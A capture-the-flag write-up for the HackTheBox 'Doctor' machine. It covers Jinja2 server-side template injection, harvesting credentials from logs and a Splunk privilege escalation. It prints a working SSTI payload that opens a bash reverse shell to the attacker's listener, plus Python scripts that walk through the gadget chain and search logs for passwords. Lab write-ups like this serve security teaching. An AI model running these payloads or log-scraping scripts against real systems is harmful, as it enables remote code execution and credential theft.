HackTheBox Writeup — Doctor
Hello guys, I am Faisal Husaini. My username on HTB is "feodore". Also join me on Discord.
The IP of this box is 10.10.10.209
Port Scan
Running a full-port Nmap scan against it, we get
We find three open ports: SSH, Apache (HTTP) and Splunk.
Moving to the web part first.
Web
Opening the IP in the browser, we get a medical website.
The site mentions the hostname doctors.htb, which we add to the hosts file and then open in the browser.
We get a login page. I create a user, log in and find a message-posting feature, where I inject several template-injection payloads.
Nothing appears to happen in the response, but looking at the gobuster results we see an /archive directory.
The page source after login also says that this directory is under beta testing.
The /archive page renders blank, but its source shows that one of the injected payloads was evaluated.
Through further testing I confirmed that the template engine in use is Jinja2.
So I used the payload below from PayloadsAllTheThings to get a reverse shell (10.10.14.34:9001 is my attacking host and listener):
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('bash -c "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1"').read()}}{%endif%}{%endfor%}
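To see why that payload works, here is each hop of the gadget chain reproduced as plain Python. This is an added illustration, not code from the writeup, the box or PayloadsAllTheThings: the payload walks from a tuple literal up to object, down into every loaded subclass, picks one whose name contains "warning" (warnings.catch_warnings), and uses the module reference that class keeps in _module to reach __builtins__['__import__'] and import os. The engine-fingerprinting helper encodes the usual probe logic (Jinja2 repeats a string when multiplied, Twig coerces it to a number); the observed probe values in demo() are constructed, and the module check in find_gadget_class() is an addition for determinism.

```python
"""Dissect the Jinja2 SSTI gadget chain step by step (added example)."""
import os
import warnings  # ensures warnings.catch_warnings is a loaded subclass of object


def find_gadget_class():
    """Hop 1: ().__class__.__base__.__subclasses__() plus the payload's name filter."""
    base = ().__class__.__base__  # tuple -> object
    for cls in base.__subclasses__():
        # The payload accepts any class with "warning" in its name. The module
        # check is an addition here so the demo stays deterministic even if
        # some other "*warning*" class is loaded in this interpreter.
        if "warning" in cls.__name__ and cls.__module__ == "warnings":
            return cls
    raise LookupError("no gadget class found")


def reach_os_via_gadget():
    """Hops 2-4: x()._module.__builtins__['__import__']('os')."""
    gadget = find_gadget_class()()      # catch_warnings() does nothing until entered
    module = gadget._module             # the `warnings` module object
    builtins = module.__builtins__      # a dict for every module except __main__
    if not isinstance(builtins, dict):  # defensive: handle the module form too
        builtins = vars(builtins)
    return builtins["__import__"]("os")


def run_via_gadget(cmd):
    """Final hop: os.popen(cmd).read(), which the payload points at a reverse shell."""
    return reach_os_via_gadget().popen(cmd).read()


def identify_engine(observed):
    """Map probe -> rendered text to an engine family.

    {{7*7}} only tells you that braces are evaluated; {{7*'7'}} is decisive,
    because Python repeats the string while PHP/Twig multiplies numbers.
    """
    if observed.get("{{7*7}}") != "49":
        return None  # probe echoed back unevaluated: not a {{ }} engine, or not injectable here
    if observed.get("{{7*'7'}}") == "7777777":
        return "Jinja2"
    if observed.get("{{7*'7'}}") == "49":
        return "Twig"
    return "unknown {{ }} engine"


def demo():
    """Constructed probe results, then prove the chain lands on the real os module."""
    engine = identify_engine({"{{7*7}}": "49", "{{7*'7'}}": "7777777"})
    same_module = reach_os_via_gadget() is os
    return engine, same_module


if __name__ == "__main__":
    print(demo())                          # ('Jinja2', True)
    print(run_via_gadget("id").strip())    # executes in-process, no network needed
```

The chain never names os or import in the template itself, which is why naive blocklists on those words do not stop it; the fix on the application side is to never pass user input as the template source (render_template_string on a concatenated string is the classic mistake) and to keep Jinja2's SandboxedEnvironment in front of anything that must render untrusted templates.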
We get a reverse shell and now move towards user escalation.
The current user, web, is a member of the adm group, which has read permission on various log files.
One of the log files leaks a password, which we try for the user Shaun.
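A systematic way to do that log hunt, as an added example that is not from the writeup: walk the log tree, keep only files the current user can actually read (adm grants read on many files under /var/log, not all of them), and report lines matching credential-like key/value pairs. The log lines and the password value in demo() are constructed for the demo; the patterns are the usual suspects for secrets that end up in web and auth logs.

```python
"""Grep readable log files for credential-looking strings (added example)."""
import os
import re
import tempfile

# Key/value shapes that commonly leak secrets into logs: query strings,
# form bodies, reset links and explicit "password=" style pairs.
CRED_PATTERN = re.compile(r"(?i)\b(pass(?:word|wd)?|pwd|secret|token)\s*[=:]\s*\S+")


def scan_logs(root):
    """Return (path, line_no, line) for every readable line matching CRED_PATTERN."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not os.access(path, os.R_OK):  # skip what adm does not let us read
                continue
            try:
                with open(path, "r", errors="replace") as fh:  # logs may hold stray bytes
                    for line_no, line in enumerate(fh, 1):
                        if CRED_PATTERN.search(line):
                            hits.append((path, line_no, line.rstrip("\n")))
            except OSError:
                continue  # rotated/removed underneath us, or unreadable after all
    return hits


def demo():
    """Build a throwaway log tree with constructed lines and scan it."""
    with tempfile.TemporaryDirectory(prefix="logdemo_") as root:
        os.makedirs(os.path.join(root, "apache2"))
        samples = {
            "auth.log": (
                "Sep  5 11:16:02 doctor sshd[1101]: Accepted publickey for web "
                "from 10.10.14.34 port 52100 ssh2\n"
            ),
            # Constructed: a password that was put in a GET query string and logged.
            "apache2/backup": (
                '10.10.14.34 - - [05/Sep/2020:11:17:34 +0200] '
                '"GET /reset_password?password=Example%21123 HTTP/1.1" 500 453\n'
                '10.10.14.34 - - [05/Sep/2020:11:17:35 +0200] '
                '"GET /static/main.css HTTP/1.1" 200 1337\n'
            ),
        }
        for rel, content in samples.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(content)
        return scan_logs(root)


if __name__ == "__main__":
    for path, line_no, line in demo():
        print(f"{path}:{line_no}: {line}")
```

On a real box point scan_logs at /var/log; expect noise from words like "token" in unrelated messages, so read the hits rather than trusting the first one, and note that anything found this way is only a candidate until it authenticates.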
Privilege Escalation
At the start we saw that the machine runs Splunk 8.0.5, and a Google search for a local privilege escalation against it turns up a bash-scripted exploit that escalates to root without issue. Before running it, confirm that the Splunk process is actually running as root (for example with ps -ef | grep splunk), since that is what makes the escalation land as root.
After running the exploit we get root; the link to the exploit is in the references below.